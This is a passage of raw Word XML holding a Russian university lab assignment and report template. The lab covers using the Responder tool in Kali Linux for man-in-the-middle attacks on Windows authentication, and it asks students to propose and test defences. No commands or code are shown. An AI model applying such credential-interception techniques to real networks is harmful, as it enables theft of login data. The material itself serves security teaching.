        <w:t>esponder’</w:t>
      </w:r>
      <w:r w:rsidR="009E6CEC">
        <w:t>а</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009E6CEC" w:rsidRPr="009E6CEC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009E6CEC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>RunFinger</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009E6CEC">
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AB4633E" w14:textId="1E81F893" w:rsidR="009E6CEC" w:rsidRDefault="00FA501D" w:rsidP="008F4D2E">
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:bookmarkStart w:id="12" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="12"/>
      <w:r w:rsidR="009E6CEC">
        <w:t>.2. Какие данные из отчёта программы нам необходимы для понимания уязвимости виртуальной машины?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F42A687" w14:textId="77777777" w:rsidR="00E908A9" w:rsidRDefault="0050766A" w:rsidP="00510FB1">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="0050766A">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="516F6D1D" wp14:editId="3AB9D424">
            <wp:extent cx="5763429" cy="3439005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61AF" w14:textId="77777777" w:rsidR="00793E6D" w:rsidRDefault="00793E6D" w:rsidP="008F4D2E"/>
    <w:p w14:paraId="28DF4BD8" w14:textId="5F3A49F3" w:rsidR="00793E6D" w:rsidRPr="0016052D" w:rsidRDefault="00CD62DA" w:rsidP="0016052D">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>IV</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB4790">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Выводы по лабораторной работе</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="196D6C12" w14:textId="4879E28E" w:rsidR="00793E6D" w:rsidRDefault="00793E6D" w:rsidP="008F4D2E">
      <w:r>
        <w:t>1. Предложить варианты защиты</w:t>
      </w:r>
      <w:r w:rsidR="000306F4">
        <w:t xml:space="preserve"> от представленного в лабораторной работе варианта </w:t>
      </w:r>
      <w:commentRangeStart w:id="13"/>
      <w:r w:rsidR="000306F4">
        <w:t>атаки</w:t>
      </w:r>
      <w:commentRangeEnd w:id="13"/>
      <w:r w:rsidR="001D7AF0">
        <w:rPr>
          <w:rStyle w:val="af6"/>
        </w:rPr>
        <w:commentReference w:id="13"/>
      </w:r>
      <w:r w:rsidR="000306F4">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15D7B6C6" w14:textId="4E4F04D9" w:rsidR="00150CF3" w:rsidRPr="00150CF3" w:rsidRDefault="00150CF3" w:rsidP="008F4D2E">
      <w:r w:rsidRPr="00150CF3">
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:t>Реализовать защитные меры</w:t>
      </w:r>
      <w:r w:rsidR="000306F4">
        <w:t xml:space="preserve"> и предоставить скриншот.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F8B814E" w14:textId="1D86A5F1" w:rsidR="00620FE2" w:rsidRDefault="00793E6D" w:rsidP="008F4D2E">
      <w:r>
        <w:t>2. Проверить работосп</w:t>
      </w:r>
      <w:r w:rsidR="00150CF3">
        <w:t>особность</w:t>
      </w:r>
      <w:r w:rsidR="000306F4">
        <w:t xml:space="preserve"> принятых защитных мер</w:t>
      </w:r>
      <w:r w:rsidR="00150CF3">
        <w:t xml:space="preserve"> с</w:t>
      </w:r>
      <w:r w:rsidR="00674E5B">
        <w:t xml:space="preserve"> описанием и скриншотами</w:t>
      </w:r>
      <w:r w:rsidR="000306F4">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75EC49BA" w14:textId="072ACE93" w:rsidR="000306F4" w:rsidRDefault="00AC4475" w:rsidP="008F4D2E">
      <w:r>
        <w:t>3. Сделать выводы</w:t>
      </w:r>
      <w:r w:rsidR="000306F4">
        <w:t xml:space="preserve"> по лабораторной работе.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10439E98" w14:textId="77777777" w:rsidR="000306F4" w:rsidRDefault="000306F4">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D27E1BF" w14:textId="77777777" w:rsidR="000306F4" w:rsidRPr="006A0213" w:rsidRDefault="000306F4" w:rsidP="000306F4">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006A0213">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Отчёт по результатам выполнения лабораторной работы</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E0C1C86" w14:textId="77777777" w:rsidR="000306F4" w:rsidRPr="008E78E3" w:rsidRDefault="000306F4" w:rsidP="000306F4">
      <w:pPr>
        <w:ind w:firstLine="426"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E78E3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Титульный лист:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41AF2D1A" w14:textId="77777777" w:rsidR="000306F4" w:rsidRDefault="000306F4" w:rsidP="000306F4">
      <w:pPr>
        <w:pStyle w:val="afc"/>
        <w:ind w:firstLine="426"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="786211EA" w14:textId="77777777" w:rsidR="000306F4" w:rsidRPr="00D648EC" w:rsidRDefault="000306F4" w:rsidP="000306F4">
      <w:pPr>
        <w:pStyle w:val="afc"/>
        <w:ind w:firstLine="426"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00D648EC">
        <w:t xml:space="preserve">МИНИСТЕРСТВО НАУКИ И ВЫСШЕГО ОБРАЗОВАНИЯ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6556252F" w14:textId="77777777" w:rsidR="000306F4" w:rsidRPr="00D648EC" w:rsidRDefault="000306F4" w:rsidP="000306F4">
      <w:pPr>
        <w:pStyle w:val="afc"/>
        <w:ind w:firstLine="426"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00D648EC">
        <w:t>РОССИЙСКОЙ ФЕДЕРАЦИИ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34DD5A8F" w14:textId="77777777" w:rsidR="000306F4" w:rsidRPr="00D648EC" w:rsidRDefault="000306F4" w:rsidP="000306F4">
      <w:pPr>
        <w:pStyle w:val="afc"/>
        <w:ind w:firstLine="426"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00D648EC">
        <w:t xml:space="preserve">ФГБОУ ВО «НАЦИОНАЛЬНЫЙ ИССЛЕДОВАТЕЛЬСКИЙ УНИВЕРСИТЕТ «МЭИ» </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE7FBAA" w14:textId="77777777" w:rsidR="000306F4" w:rsidRPr="00D648EC" w:rsidRDefault="000306F4" w:rsidP="000306F4">
      <w:pPr>
        <w:ind w:firstLine="426"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:caps/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20AE68D3" w14:textId="77777777" w:rsidR="000306F4" w:rsidRPr="00D648EC" w:rsidRDefault="000306F4" w:rsidP="000306F4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Cs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D648EC">
        <w:rPr>
          <w:rStyle w:val="FontStyle17"/>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Факультет/институт</w:t>
      </w:r>
      <w:r w:rsidRPr="00D648EC">
        <w:rPr>
          <w:rStyle w:val="FontStyle17"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D648EC">
        <w:rPr>
          <w:rStyle w:val="FontStyle17"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Инженерно-экономический институт</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DF825BE" w14:textId="77777777" w:rsidR="000306F4" w:rsidRPr="00D648EC" w:rsidRDefault="000306F4" w:rsidP="000306F4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 w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D648EC">
        <w:rPr>
          <w:rStyle w:val="FontStyle17"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">                                                  (название факультета/института)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13CCC19E" w14:textId="77777777" w:rsidR="000306F4" w:rsidRPr="00D648EC" w:rsidRDefault="000306F4" w:rsidP="000306F4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Cs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D648EC">
        <w:rPr>
          <w:rStyle w:val="FontStyle17"/>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Кафедра</w:t>
      </w:r>
      <w:r w:rsidRPr="00D648EC">
        <w:rPr>
          <w:rStyle w:val="FontStyle17"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D648EC">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Безопасности и информационных технологий»</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="312C8AD7" w14:textId="77777777" w:rsidR="000306F4" w:rsidRPr="00D648EC" w:rsidRDefault="000306F4" w:rsidP="000306F4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 w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D648EC">
        <w:rPr>
          <w:rStyle w:val="FontStyle17"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">            (название кафедры)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14D715AD" w14:textId="77777777" w:rsidR="000306F4" w:rsidRPr="00D648EC" w:rsidRDefault="000306F4" w:rsidP="000306F4">
      <w:pPr>
        <w:pStyle w:val="Style4"/>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="13500"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="426"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A6750D6" w14:textId="77777777" w:rsidR="000306F4" w:rsidRPr="00D648EC" w:rsidRDefault="000306F4" w:rsidP="000306F4">
      <w:pPr>
        <w:pStyle w:val="Style4"/>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="13500"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="426"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0894E40F" w14:textId="77777777" w:rsidR="000306F4" w:rsidRPr="00D648EC" w:rsidRDefault="000306F4" w:rsidP="000306F4">
      <w:pPr>
        <w:ind w:firstLine="426"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52FDBD69" w14:textId="77777777" w:rsidR="000306F4" w:rsidRPr="00D648EC" w:rsidRDefault="000306F4" w:rsidP="000306F4">
      <w:pPr>
        <w:ind w:firstLine="426"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B583431" w14:textId="4A60BFE6" w:rsidR="000306F4" w:rsidRPr="00D648EC" w:rsidRDefault="000306F4" w:rsidP="000306F4">
      <w:pPr>
        <w:ind w:firstLine="426"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:caps/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:caps/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Отчет по лабораторной работе № 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D72DD8" w14:textId="77777777" w:rsidR="000306F4" w:rsidRPr="00D648EC" w:rsidRDefault="000306F4" w:rsidP="000306F4">
      <w:pPr>
        <w:ind w:firstLine="426"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27067CA1" w14:textId="60DA9BD8" w:rsidR="000306F4" w:rsidRPr="00F333B4" w:rsidRDefault="000306F4" w:rsidP="000306F4">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-12"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D648EC">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Дисциплина</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>: </w:t>
      </w:r>
      <w:r w:rsidRPr="00F333B4">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Технологии защиты информационных систем от кибератак</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00F333B4">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-12"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Тема:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-12"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="000306F4">
        <w:rPr>
          <w:bCs/>
          <w:spacing w:val="-12"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Изучение возможностей применения инструмента </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000306F4">
        <w:rPr>
          <w:bCs/>
          <w:spacing w:val="-12"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Responder</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000306F4">
        <w:rPr>
          <w:bCs/>
          <w:spacing w:val="-12"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> в ОС </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000306F4">
        <w:rPr>
          <w:bCs/>
          <w:spacing w:val="-12"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Kali</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000306F4">
        <w:rPr>
          <w:bCs/>
          <w:spacing w:val="-12"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000306F4">
        <w:rPr>
          <w:bCs/>
          <w:spacing w:val="-12"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000306F4">
        <w:rPr>
          <w:bCs/>
          <w:spacing w:val="-12"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> для выполнения атаки человек-посередине в отношении методов аутентификации в Windows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:spacing w:val="-12"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE7F911" w14:textId="77777777" w:rsidR="000306F4" w:rsidRPr="00D648EC" w:rsidRDefault="000306F4" w:rsidP="000306F4">
      <w:pPr>
        <w:ind w:firstLine="426"/>
        <w:rPr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356"/>
        <w:gridCol w:w="351"/>
        <w:gridCol w:w="149"/>
        <w:gridCol w:w="356"/>
        <w:gridCol w:w="629"/>
        <w:gridCol w:w="7"/>
        <w:gridCol w:w="955"/>
        <w:gridCol w:w="7"/>
        <w:gridCol w:w="25"/>
      </w:tblGrid>
      <w:tr w:rsidR="000306F4" w14:paraId="15985CF7" w14:textId="77777777" w:rsidTr="002F76F7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2692" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="644ACD14" w14:textId="77777777" w:rsidR="000306F4" w:rsidRDefault="000306F4" w:rsidP="002F76F7">
            <w:pPr>
              <w:spacing w:before="120"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В</w:t>
            </w:r>
            <w:r w:rsidRPr="00D648EC">
              <w:rPr>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>ыполнил студент</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="24AA522E" w14:textId="77777777" w:rsidR="000306F4" w:rsidRDefault="000306F4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994" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="351F875A" w14:textId="77777777" w:rsidR="000306F4" w:rsidRDefault="000306F4" w:rsidP="002F76F7">
            <w:pPr>
              <w:spacing w:before="120" w:line="240" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D648EC">
              <w:rPr>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>курса</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000306F4" w:rsidRPr="00260D0B" w14:paraId="75EB0B1B" w14:textId="77777777" w:rsidTr="002F76F7">
        <w:trPr>
          <w:gridAfter w:val="2"/>
          <w:wAfter w:w="32" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4788" w:type="dxa"/>
            <w:gridSpan w:val="8"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="11333E55" w14:textId="77777777" w:rsidR="000306F4" w:rsidRPr="00260D0B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260D0B">
              <w:rPr>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>очно-заочной формы обучения</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000306F4" w14:paraId="16D1CB6B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55160EE8" w14:textId="77777777" w:rsidR="000306F4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Группа</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve"> №:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2810" w:type="dxa"/>
            <w:gridSpan w:val="8"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4A46BD1D" w14:textId="77777777" w:rsidR="000306F4" w:rsidRDefault="000306F4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ИЭ-41-17</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000306F4" w14:paraId="4D4AC949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09757F19" w14:textId="77777777" w:rsidR="000306F4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ФИО</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2810" w:type="dxa"/>
            <w:gridSpan w:val="8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99089" w14:textId="77777777" w:rsidR="000306F4" w:rsidRDefault="000306F4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</w:tr>
      <w:tr w:rsidR="000306F4" w14:paraId="6771FD9C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4918D68D" w14:textId="77777777" w:rsidR="000306F4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Проверил</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2810" w:type="dxa"/>
            <w:gridSpan w:val="8"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="58EBC1AD" w14:textId="77777777" w:rsidR="000306F4" w:rsidRDefault="000306F4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</w:tr>
      <w:tr w:rsidR="000306F4" w14:paraId="347C9432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1B1B3BDD" w14:textId="77777777" w:rsidR="000306F4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ФИО</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2810" w:type="dxa"/>
            <w:gridSpan w:val="8"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7ED4603A" w14:textId="77777777" w:rsidR="000306F4" w:rsidRDefault="000306F4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Дратвяк А.В.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000306F4" w14:paraId="578C6A54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2A4E1736" w14:textId="77777777" w:rsidR="000306F4" w:rsidRPr="00D648EC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 xml:space="preserve">дата </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>проверки:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="356" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="10DD2C51" w14:textId="77777777" w:rsidR="000306F4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«</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="50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F9CDA9" w14:textId="77777777" w:rsidR="000306F4" w:rsidRDefault="000306F4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356" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7D5382A4" w14:textId="77777777" w:rsidR="000306F4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»</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="636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C7BAE7" w14:textId="77777777" w:rsidR="000306F4" w:rsidRDefault="000306F4" w:rsidP="002F76F7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962" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1459E3FF" w14:textId="77777777" w:rsidR="000306F4" w:rsidRDefault="000306F4" w:rsidP="002F76F7">
            <w:pPr>
              <w:spacing w:before="120" w:line="24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2020г.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000306F4" w14:paraId="345B521C" w14:textId="77777777" w:rsidTr="002F76F7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40D7F74D" w14:textId="77777777" w:rsidR="000306F4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Оценка</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2810" w:type="dxa"/>
            <w:gridSpan w:val="8"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="38371632" w14:textId="77777777" w:rsidR="000306F4" w:rsidRDefault="000306F4" w:rsidP="002F76F7">
            <w:pPr>
              <w:spacing w:before="120" w:line="240" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2E69BCC3" w14:textId="77777777" w:rsidR="000306F4" w:rsidRPr="00D648EC" w:rsidRDefault="000306F4" w:rsidP="000306F4">
      <w:pPr>
        <w:ind w:firstLine="426"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="297B4E59" w14:textId="77777777" w:rsidR="000306F4" w:rsidRPr="00D648EC" w:rsidRDefault="000306F4" w:rsidP="000306F4">
      <w:pPr>
        <w:ind w:firstLine="426"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E742D54" w14:textId="77777777" w:rsidR="000306F4" w:rsidRPr="00D648EC" w:rsidRDefault="000306F4" w:rsidP="000306F4">
      <w:pPr>
        <w:ind w:firstLine="426"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69FBB8DE" w14:textId="77777777" w:rsidR="000306F4" w:rsidRPr="006A0213" w:rsidRDefault="000306F4" w:rsidP="000306F4">
      <w:pPr>
        <w:ind w:firstLine="426"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D648EC">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Москва, 201_г.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78F0162E" w14:textId="77777777" w:rsidR="000306F4" w:rsidRPr="001152AD" w:rsidRDefault="000306F4" w:rsidP="000306F4">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Результаты выполнения лабораторной работы</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38D817B6" w14:textId="418C1E98" w:rsidR="001D7AF0" w:rsidRDefault="000306F4" w:rsidP="000306F4">
      <w:r>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r w:rsidR="001D7AF0">
        <w:t xml:space="preserve">Пояснение сделанного выбора в пользу «Сети </w:t>
      </w:r>
      <w:r w:rsidR="001D7AF0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>NAT</w:t>
      </w:r>
      <w:r w:rsidR="001D7AF0">
        <w:t>» при первичной настройке сети виртуальной машины.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="377E7740" w14:textId="77777777" w:rsidR="001D7AF0" w:rsidRPr="001D7AF0" w:rsidRDefault="001D7AF0" w:rsidP="000306F4"/>
    <w:p w14:paraId="2D8FD461" w14:textId="7FC0D070" w:rsidR="000306F4" w:rsidRDefault="001D7AF0" w:rsidP="000306F4">
      <w:r>
        <w:t xml:space="preserve">2. Результаты создания виртуальных машин в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>VirtualBox</w:t>
      </w:r>
      <w:r w:rsidRPr="001D7AF0">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>с указанием следующих данных:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FF8CD84" w14:textId="77777777" w:rsidR="001D7AF0" w:rsidRDefault="001D7AF0" w:rsidP="001D7AF0">
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>VirtualBox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
